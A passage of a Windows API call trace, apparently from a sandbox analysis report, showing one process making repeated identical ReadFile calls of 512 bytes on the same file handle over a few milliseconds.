lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.320] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.321] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.322] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.323] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.324] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.325] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.326] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, 